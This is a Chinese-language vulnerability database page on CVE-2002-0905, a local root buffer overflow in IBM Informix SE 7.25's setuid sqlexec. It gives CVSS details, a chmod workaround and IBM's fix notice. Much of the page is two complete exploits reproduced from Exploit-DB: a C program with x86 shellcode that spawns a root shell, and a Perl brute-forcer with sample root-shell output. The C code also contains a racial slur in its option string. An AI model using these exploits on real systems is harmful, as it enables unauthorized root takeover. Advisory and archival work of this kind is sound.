CVE-2002-0905
CVSS7.2
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:15
NMCOES    

[原文]Buffer overflow in sqlexec for Informix SE-7.25 allows local users to gain root privileges via a long INFORMIXDIR environment variable.


[CNNVD]IBM Informix SE sqlexec本地缓冲区溢出漏洞(CNNVD-200210-231)

        
        Informix是一款由IBM公司开发和维护的企业级数据库系统。
        Linux系统下的Informix-SE中的sqlexec对环境变量处理存在漏洞,可导致本地攻击者进行缓冲区溢出攻击,并提升权限。
        Informix-SE中的sqlexec对拷贝到本地缓冲区中的INFORMIXDIR环境变量的边界长度缺少正确充分的检查,可导致本地攻击者提供超长的字符串数据作为INFORMIXDIR环境变量,当sqlexec处理时导致缓冲区溢出,由于sqlexec以setuid root属性方式安装,精心构建字符串数据可导致以root权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ibm:informix:7.25_.uc1_seIBM Informix 7.25 .UC1 SE
cpe:/a:ibm:informix:7.25_.uc3_seIBM Informix 7.25 .UC3 SE
cpe:/a:ibm:informix:7.25_.uc2_seIBM Informix 7.25 .UC2 SE

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0905
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0905
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-231
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4891
(VENDOR_ADVISORY)  BID  4891
http://www.iss.net/security_center/static/9219.php
(VENDOR_ADVISORY)  XF  informix-sqlexec-bo(9219)
http://archives.neohapsis.com/archives/bugtraq/2002-05/0270.html
(UNKNOWN)  BUGTRAQ  20020529 Informix SE-7.25 /lib/sqlexec Vulnerability

- 漏洞信息

IBM Informix SE sqlexec本地缓冲区溢出漏洞
高危 边界条件错误
2002-10-04 00:00:00 2005-10-20 00:00:00
本地  
        
        Informix是一款由IBM公司开发和维护的企业级数据库系统。
        Linux系统下的Informix-SE中的sqlexec对环境变量处理存在漏洞,可导致本地攻击者进行缓冲区溢出攻击,并提升权限。
        Informix-SE中的sqlexec对拷贝到本地缓冲区中的INFORMIXDIR环境变量的边界长度缺少正确充分的检查,可导致本地攻击者提供超长的字符串数据作为INFORMIXDIR环境变量,当sqlexec处理时导致缓冲区溢出,由于sqlexec以setuid root属性方式安装,精心构建字符串数据可导致以root权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * chmod a-s /lib/sqlexec
        厂商补丁:
        IBM
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.informix.com/

- 漏洞信息 (21496)

IBM Informix SE 7.25 sqlexec Buffer Overflow Vulnerability (1) (EDBID:21496)
linux local
2002-05-30 Verified
0 smurf
N/A [点击下载]
source: http://www.securityfocus.com/bid/4891/info

Informix is an enterprise database distributed and maintained by IBM.

A buffer overflow vulnerability has been reported for Informix-SE for Linux. The overflow is due to an unbounded string copy of the INFORMIXDIR environment variable to a local buffer. There is at least one setuid root executable that is vulnerable, `sqlexec'. A malicious user may exploit the overflow condition in sqlexec to gain root privileges. 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

#define BUFFERSIZE 2032

/* linux x86 shellcode */
char lunixshell[] =  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

struct target
 {
  char *os_name;
  u_long retadd;
  u_long offset;
};

struct target targets[] =
 {
  { "RedHat 7.0 - Guinness   ", 0xbfffee04, 895,         },
  { "Mandrake 8.2 - Bluebird", 0xbfffee30, -1999,         },
   {
     NULL, 0L, 0L
  }
};

int type=-1;

void usage(char *cmd)
{
    int i=0;

      printf("[<>] - IBM x86 IBM INFORMIX SE-7.25 sqlexec local root exploit\n");
      printf("[<>] - by smurf, division7 security systems\n");
	printf("[<>] - usage: %s  -t target -r [return address] -o [offset]\n", cmd);
      printf("[<>] - Targets:\n\n");

      while( targets[i].os_name != NULL)
         printf ("[ Type %d:  [ %s ]\n", i++, targets[i].os_name);
}

int main(int argc, char *argv[])
{
	int i, c, os;
	long *addr_ptr;
	char *buffer, *ptr, *osptr;

	
	/* offset = atoi(argv[1]);  */
 	/* esp    = retadd; */
      /* ret    = esp-offset; */


     if(argc < 3)
       {
         usage(argv[0]);
         return 1;
       }

      while(( c = getopt (argc, argv, "t:r:o:nigger"))!= EOF){

      switch (c)
        {

         case 't':
            type = atoi(optarg);
            break;
 
         case 'r':
            targets[type].retadd = strtoul(optarg, NULL, 16);
            break;

         case 'o':
            targets[type].offset = atoi(optarg);
            break;

        default:
          usage(argv[0]);
          return 1;
        }
   }


	printf("[<>] - Stack pointer: 0x%x\n", targets[type].retadd);
	printf("[<>] - Offset: 0x%x\n", targets[type].offset);
	printf("[<>] - Return addr: 0x%x\n", targets[type].retadd - targets[type].offset);


	/* allocate memory for our buffer */
	if(!(buffer = malloc(BUFFERSIZE))) {
		printf("Couldn't allocate memory.\n");
		exit(-1);
	}

	/* fill buffer with ret addr's */
	ptr = buffer;
	addr_ptr = (long *)ptr;
	for(i=0; i<BUFFERSIZE; i+=4)
		*(addr_ptr++) = targets[type].retadd - targets[type].offset;

	/* fill first half of buffer with NOPs */
	for(i=0; i<BUFFERSIZE/2; i++)
		buffer[i] = '\x90';

	/* insert shellcode in the middle */
	ptr = buffer + ((BUFFERSIZE/2) - (strlen(lunixshell)/2));
	for(i=0; i<strlen(lunixshell); i++)
		*(ptr++) = lunixshell[i];


	/* call the vulnerable program passing our exploit buffer as the argument */

	buffer[BUFFERSIZE-1] = 0;
      setenv("INFORMIXDIR", buffer, 1);
	execl("./sqlexec", "sqlexec", NULL); 
	return 0;
}

����������������������������������������������������������������������������������������������������������������������������		

- 漏洞信息 (21497)

IBM Informix SE 7.25 sqlexec Buffer Overflow Vulnerability (2) (EDBID:21497)
linux local
2002-05-30 Verified
0 pHrail
N/A [点击下载]
source: http://www.securityfocus.com/bid/4891/info
 
Informix is an enterprise database distributed and maintained by IBM.
 
A buffer overflow vulnerability has been reported for Informix-SE for Linux. The overflow is due to an unbounded string copy of the INFORMIXDIR environment variable to a local buffer. There is at least one setuid root executable that is vulnerable, `sqlexec'. A malicious user may exploit the overflow condition in sqlexec to gain root privileges. 

#!/usr/bin/perl 
# IBM SE 7.25.UC1 for INTEL LINUX 2.4 GLIBC2.2.X
# Local Root Exploit by pHrail
# This exploits the sqlexec binary, and yields UID=0
# Tested on Mandrake Linux 8.2.  All other Linux presumed vulnerable
#
# IBM still hasn't patched this hole, and is available on their
# website http://www.informix.com/evaluate/
#
# shouts to Division7 and smurfy for help testing on this
# http://www.divisi0n7.org
#
# 
# [phrail@phrailnix phrail]$ ./ibm.pl -2000 
# *** Division 7 Security
# *** Now Exploiting sqlexec
# *** Offset: 0xfffff830
# *** Return: 0xbfffeb00
# *** Address: 0xbfffe330
# sh-2.05# id
# uid=0(root) gid=501(phrail) groups=501(phrail),43(usb)
# sh-2.05#
#
# (Note) May want to increase $buf 4 to 8 bytes depending on OS
use strict;

# $SIG{INT} = \&controlme;

my $argsnum = @ARGV;

if ($argsnum < 0 || $argsnum > 1) {
	&usage;
	exit;
}

# -2000 seemed to work on Mandrake 8.2

my $offset = $ARGV[0];
$offset = 0 unless $offset;

my $ret = 0xbfffeb00;

my $buf = 2024;

my $nop = "\x90";



# Our generic 48 byte shellcode.
my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
                 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
                 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
                 "\x80\xe8\xdc\xff\xff\xff/bin/sh";


print "*** Now Overflowing INFORMIXDIR Variable\n";
 $ENV{'INFORMIXDIR'} = "A" x 2024; 
print "*** Now Calculating Your esp (Return Address Value)\n";
my $gotaddr = `gdb --command=gdbfile sqlexec | grep esp | cut -f2`;
print "*** Your Calculated Return Address Is $gotaddr\n";
print "*** Calculating Other Possible Addresses\n";

chop(my $get = $gotaddr);

my $minus = 4;
my @oop;
$oop[0] = $get - $minus;
$oop[1] = $get - $minus - $minus;
$oop[2] = $get - 0; 
$oop[3] = $get + $minus; 
$oop[4] = $get + $minus + $minus;

print("*** Gots 1 0x", sprintf('%lx',($oop[0])), "\n");
print("*** Gots 2 0x", sprintf('%lx',($oop[1])), "\n"); 
print("*** Gots 3 0x", sprintf('%lx',($oop[2])), "\n"); 
print("*** Gots 4 0x", sprintf('%lx',($oop[3])), "\n"); 
print("*** Gots 5 0x", sprintf('%lx',($oop[4])), "\n"); 
print("*** Gots 6 Default 0x", sprintf('%lx',($ret)), "\n"); 
print "*** Which esp do you want to use? (1 - 6) : ";
chomp(my $retv = <STDIN>);
my $retva;
if ($retv == 1) {
	$retva = $oop[0];
} elsif ($retv == 2) {
 	$retva = $oop[1];
} elsif ($retv == 3) {
	$retva = $oop[2];
} elsif ($retv == 4) {
	$retva = $oop[3];
} elsif ($retv == 5) {
	$retva = $oop[4];
} elsif ($retv == 6) {
	print "*** Using Default Return Address\n ";
	$retva = $ret;
} else {

	print "Invalid Option Lamer (1 - 6)\n";
	print "Goodbye\n";
	exit;
}






print "*** Do you want to brute? ( Y - N) : ";
chomp(my $brutea = <STDIN>);

if ($brutea =~/y/i) {
	&brute;
} else {
	&nbrute;
}

sub nbrute {
my $i;
my $buffer;
for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
	  $buffer .= $nop;
	   }
	     $buffer .= $shellcode;
	      
	     my $addr = pack('l', ($ret + $offset));
	      for ($i += length($shellcode); $i < $buf; $i += 4) {
		        $buffer .= $addr;
			 }

print "*** Division 7 Security\n"; 
print "*** Now Exploiting sqlexec\n";
print("*** Offset: 0x", sprintf('%lx',($offset)), "\n"); 
print("*** Return: 0x", sprintf('%lx',($retva)), "\n");  
print("*** Address: 0x", sprintf('%lx',($retva + $offset)), "\n");
 $ENV{'INFORMIXDIR'} = $buffer; exec("./home/phrail/SE/lib/sqlexec");

}

sub brute {
	my $i;
	my $buffer;
	my $p;
	print "Now Bruting Offsets -2000 - 2000\n";
	
	         for($p = -2000;$p < 2000;$p++) {
	for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
		  $buffer .= $nop;
		   }
		     $buffer .= $shellcode;
		      
		     my $addr = pack('l', ($ret + $p));
		      for ($i += length($shellcode); $i < $buf; $i += 4) {
			        $buffer .= $addr;
				 }

		
		         print(" *");
		
		
		 $ENV{'INFORMIXDIR'} = $buffer; system("./home/phrail/SE/lib/sqlexec");
    


			 
		 }	
	print "\nDone bruting...try another return address or increase the buffer.\n";
	print "Division 7 Security Systems\n";
	print "-pHrail\n";
	exit;
}

sub controlme {
	        $SIG{INT} = \&controlme;
	        print "Signal Caught Now Exiting\n";
	        print "Divison 7 Security Systems\n";
	   
	    
	      
	        
	        exit;
		`killall -9 $0`;
	}
sub usage {


print "*** IBM SE 7.25.UC1 for INTEL LINUX 2.4 GLIBC2.2.X\n";
print "*** Local Root Exploit by pHrail\n";
print "*** Division 7 Security Systems\n";
print "*** http://www.divisi0n7.org\n";
print "*** $0 <offset>\n";

}
		

- 漏洞信息

10134
IBM Informix sqlexec INFORMIXDIR Environment Variable Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-05-29 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

IBM Informix SE sqlexec Buffer Overflow Vulnerability
Boundary Condition Error 4891
No Yes
2002-05-30 12:00:00 2009-07-11 01:56:00
Credited to Juan Manuel Pascual Escriba <pask@hades2.concha.upv.es>.

- 受影响的程序版本

IBM Informix SE 7.25 .UC3
IBM Informix SE 7.25 .UC2
IBM Informix SE 7.25 .UC1
IBM Informix SE 7.25 .UC4

- 不受影响的程序版本

IBM Informix SE 7.25 .UC4

- 漏洞讨论

Informix is an enterprise database distributed and maintained by IBM.

A buffer overflow vulnerability has been reported for Informix-SE for Linux. The overflow is due to an unbounded string copy of the INFORMIXDIR environment variable to a local buffer. There is at least one setuid root executable that is vulnerable, `sqlexec'. A malicious user may exploit the overflow condition in sqlexec to gain root privileges.

- 漏洞利用

Two exploits have been published by Division 7 Security Systems:

- 解决方案

IBM has released the following response to this issue:

"IBM Informix Database Engineering recognizes this problem which was first successfully reported to IBM Informix on 2002-05-31 via the Bugtraq Digest. Our thanks go to Juan Manual Pascual Escriba <pask@cmlc.upv.es> for bringing the matter to our attention.

The problem is known to occur in SE version 7.25.UC3 and earlier versions of the 7.2x family. There is no known workaround, but there is a fix available. Licensees should contact their local Support Center for an upgrade to IBM Informix SE version 7.25.UC4."

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站